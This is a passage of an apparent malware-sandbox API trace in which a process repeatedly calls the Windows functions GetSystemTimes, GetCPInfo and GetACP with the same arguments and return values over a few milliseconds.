(in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.870] GetACP () returned 0x4e4 [0117.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.870] GetACP () returned 0x4e4 [0117.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.870] GetACP () returned 0x4e4 [0117.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.870] GetACP () returned 0x4e4 [0117.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.870] GetACP () returned 0x4e4 [0117.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.870] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.870] GetACP () returned 0x4e4 [0117.870] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.871] GetACP () returned 0x4e4 [0117.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.871] GetACP () returned 0x4e4 [0117.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.871] GetACP () returned 0x4e4 [0117.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.871] GetACP () returned 0x4e4 [0117.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.871] GetACP () returned 0x4e4 [0117.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.871] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.871] GetACP () returned 0x4e4 [0117.871] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.872] GetACP () returned 0x4e4 [0117.872] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.892] GetACP () returned 0x4e4 [0117.892] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.892] GetACP () returned 0x4e4 [0117.892] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.892] GetACP () returned 0x4e4 [0117.892] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.892] GetACP () returned 0x4e4 [0117.892] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.892] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.892] GetACP () returned 0x4e4 [0117.893] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.893] GetACP () returned 0x4e4 [0117.893] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.893] GetACP () returned 0x4e4 [0117.893] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.893] GetACP () returned 0x4e4 [0117.893] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.893] GetACP () returned 0x4e4 [0117.893] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.893] GetACP () returned 0x4e4 [0117.893] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.893] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.893] GetACP () returned 0x4e4 [0117.893] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.894] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.894] GetACP () returned 0x4e4 [0117.894] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.894] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.894] GetACP () returned 0x4e4 [0117.894] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.894] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.894] GetACP () returned 0x4e4 [0117.894] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.894] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.894] GetACP () returned 0x4e4 [0117.894] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.894] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.894] GetACP () returned 0x4e4 [0117.894] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.894] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.894] GetACP () returned 0x4e4 [0117.895] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.895] GetACP () returned 0x4e4 [0117.895] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.895] GetACP () returned 0x4e4 [0117.895] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.895] GetACP () returned 0x4e4 [0117.895] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.895] GetACP () returned 0x4e4 [0117.895] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.895] GetACP () returned 0x4e4 [0117.895] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.895] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.895] GetACP () returned 0x4e4 [0117.895] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.896] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.896] GetACP () returned 0x4e4 [0117.896] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.896] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.896] GetACP () returned 0x4e4 [0117.896] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.896] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.896] GetACP () returned 0x4e4 [0117.896] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.896] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.896] GetACP () returned 0x4e4 [0117.896] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.896] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.896] GetACP () returned 0x4e4 [0117.896] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.896] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.896] GetACP () returned 0x4e4 [0117.896] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.896] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.897] GetACP () returned 0x4e4 [0117.897] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.897] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.897] GetACP () returned 0x4e4 [0117.897] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.897] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.897] GetACP () returned 0x4e4 [0117.897] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.897] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.897] GetACP () returned 0x4e4 [0117.897] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.897] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.897] GetACP () returned 0x4e4 [0117.897] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.897] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.897] GetACP () returned 0x4e4 [0117.897] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.897] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.897] GetACP () returned 0x4e4 [0117.897] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.898] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.898] GetACP () returned 0x4e4 [0117.898] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.898] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.898] GetACP () returned 0x4e4 [0117.898] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.898] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.898] GetACP () returned 0x4e4 [0117.898] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.898] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.898] GetACP () returned 0x4e4 [0117.898] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.898] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.898] GetACP () returned 0x4e4 [0117.898] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.898] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.898] GetACP () returned 0x4e4 [0117.898] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.898] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.899] GetACP () returned 0x4e4 [0117.899] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.899] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.899] GetACP () returned 0x4e4 [0117.899] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.899] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.899] GetACP () returned 0x4e4 [0117.899] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.899] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.899] GetACP () returned 0x4e4 [0117.899] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.899] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.899] GetACP () returned 0x4e4 [0117.899] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.899] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.899] GetACP () returned 0x4e4 [0117.899] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.899] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.899] GetACP () returned 0x4e4 [0117.899] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.900] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.900] GetACP () returned 0x4e4 [0117.900] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.900] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.900] GetACP () returned 0x4e4 [0117.900] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.900] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.900] GetACP () returned 0x4e4 [0117.900] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.900] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.900] GetACP () returned 0x4e4 [0117.900] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.900] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.900] GetACP () returned 0x4e4 [0117.900] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.900] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.900] GetACP () returned 0x4e4 [0117.900] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.901] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.901] GetACP () returned 0x4e4 [0117.901] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.901] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.901] GetACP () returned 0x4e4 [0117.901] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.901] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.901] GetACP () returned 0x4e4 [0117.901] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.901] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.901] GetACP () returned 0x4e4 [0117.901] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.901] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.901] GetACP () returned 0x4e4 [0117.901] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.901] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.901] GetACP () returned 0x4e4 [0117.901] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.901] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.901] GetACP () returned 0x4e4 [0117.901] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0117.902] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0117.902] GetACP () returned 0x4e4 [0117.902] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 